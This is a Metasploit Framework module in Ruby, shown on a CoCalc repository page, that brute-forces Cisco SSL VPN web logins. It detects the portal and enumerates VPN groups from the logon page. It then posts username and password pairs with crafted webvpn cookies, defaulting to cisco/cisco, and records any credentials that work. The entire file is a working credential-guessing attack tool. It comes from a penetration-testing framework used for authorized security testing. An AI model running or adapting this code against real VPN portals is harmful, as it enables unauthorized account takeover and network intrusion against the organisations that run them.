CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Auxiliary::Report

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Scanner

13


14
  def initialize(info={})

15
    super(update_info(info,

16
      'Name'           => 'Cisco SSL VPN Bruteforce Login Utility',

17
      'Description'    => %{

18
        This module scans for Cisco SSL VPN web login portals and

19
        performs login brute force to identify valid credentials.

20
      },

21
      'Author'         =>

22
        [

23
          'Jonathan Claudius <jclaudius[at]trustwave.com>'

24
        ],

25
      'License'        => MSF_LICENSE,

26
      'DefaultOptions' =>

27
        {

28
          'SSL' => true,

29
          'USERNAME' => 'cisco',

30
          'PASSWORD' => 'cisco'

31
        }

32
    ))

33


34
    register_options(

35
      [

36
        Opt::RPORT(443),

37
        OptString.new('GROUP', [false, "A specific VPN group to use", ''])

38
      ])

39
    register_advanced_options(

40
      [

41
        OptBool.new('EmptyGroup', [true, "Use an empty group with authentication requests", false])

42
      ])

43
  end

44


45
  def run_host(ip)

46
    unless check_conn?

47
      vprint_error("Connection failed, Aborting...")

48
      return false

49
    end

50


51
    unless is_app_ssl_vpn?

52
      vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.")

53
      return false

54
    end

55


56
    vprint_good("Application appears to be Cisco SSL VPN. Module will continue.")

57


58
    groups = Set.new

59
    if datastore['EmptyGroup'] == true

60
      groups << ""

61
    elsif datastore['GROUP'].empty?

62
      vprint_status("Attempt to Enumerate VPN Groups...")

63
      groups = enumerate_vpn_groups

64


65
      if groups.empty?

66
        vprint_warning("Unable to enumerate groups")

67
        vprint_warning("Using the default group: DefaultWEBVPNGroup")

68
        groups << "DefaultWEBVPNGroup"

69
      else

70
        vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}")

71
      end

72


73
    else

74
      groups << datastore['GROUP']

75
    end

76


77
    vprint_status("Starting login brute force...")

78
    groups.each do |group|

79
      each_user_pass do |user, pass|

80
        do_login(user, pass, group)

81
      end

82
    end

83
  end

84


85
  # Verify whether the connection is working or not

86
  def check_conn?

87
    begin

88
      res = send_request_cgi('uri' => '/', 'method' => 'GET')

89
      if res

90
        vprint_good("Server is responsive...")

91
        return true

92
      end

93
    rescue ::Rex::ConnectionRefused,

94
           ::Rex::HostUnreachable,

95
           ::Rex::ConnectionTimeout,

96
           ::Rex::ConnectionError,

97
           ::Errno::EPIPE

98
    end

99
    false

100
  end

101


102
  def get_login_resource

103
    send_request_cgi(

104
      'uri' => '/+CSCOE+/logon.html',

105
      'method' => 'GET',

106
      'vars_get' => { 'fcadbadd' => "1" }

107
    )

108
  end

109


110
  def enumerate_vpn_groups

111
    groups = Set.new

112
    group_name_regex = /<select id="group_list"  name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/

113


114
    res = get_login_resource

115
    if res && match = res.body.match(group_name_regex)

116
      group_string = match[1]

117
      groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set

118
    end

119


120
    groups

121
  end

122


123
  # Verify whether we're working with SSL VPN or not

124
  def is_app_ssl_vpn?

125
    res = get_login_resource

126
    res && res.code == 200 && res.body.match(/webvpnlogin/)

127
  end

128


129
  def do_logout(cookie)

130
    send_request_cgi(

131
      'uri' => '/+webvpn+/webvpn_logout.html',

132
      'method' => 'GET',

133
      'cookie' => cookie

134
    )

135
  end

136


137
  def report_cred(opts)

138
    service_data = {

139
      address: opts[:ip],

140
      port: opts[:port],

141
      service_name: 'Cisco SSL VPN',

142
      protocol: 'tcp',

143
      workspace_id: myworkspace_id

144
    }

145


146
    credential_data = {

147
      origin_type: :service,

148
      module_fullname: fullname,

149
      username: opts[:user],

150
      private_data: opts[:password],

151
      private_type: :password

152
    }.merge(service_data)

153


154
    login_data = {

155
      last_attempted_at: DateTime.now,

156
      core: create_credential(credential_data),

157
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

158
      proof: opts[:proof]

159
    }.merge(service_data)

160


161
    create_credential_login(login_data)

162
  end

163


164
  # Brute-force the login page

165
  def do_login(user, pass, group)

166
    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")

167


168
    begin

169
      cookie = "webvpn=; " +

170
               "webvpnc=; " +

171
               "webvpn_portal=; " +

172
               "webvpnSharePoint=; " +

173
               "webvpnlogin=1; " +

174
               "webvpnLang=en;"

175


176
      post_params = {

177
        'tgroup'  => '',

178
        'next'    => '',

179
        'tgcookieset' => '',

180
        'username' => user,

181
        'password' => pass,

182
        'Login'   => 'Logon'

183
      }

184


185
      post_params['group_list'] = group unless group.empty?

186


187
      res = send_request_cgi(

188
              'uri' => '/+webvpn+/index.html',

189
              'method' => 'POST',

190
              'ctype' => 'application/x-www-form-urlencoded',

191
              'cookie' => cookie,

192
              'vars_post' => post_params

193
            )

194


195
      if res &&

196
         res.code == 200 &&

197
         res.body.match(/SSL VPN Service/) &&

198
         res.body.match(/webvpn_logout/i)

199


200
        print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")

201


202
        do_logout(res.get_cookies)

203


204
        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)

205
        report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}")

206
        return :next_user

207


208
      else

209
        vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")

210
      end

211


212
    rescue ::Rex::ConnectionRefused,

213
           ::Rex::HostUnreachable,

214
           ::Rex::ConnectionTimeout,

215
           ::Rex::ConnectionError,

216
           ::Errno::EPIPE

217
      vprint_error("HTTP Connection Failed, Aborting")

218
      return :abort

219
    end

220
  end

221
end

222


223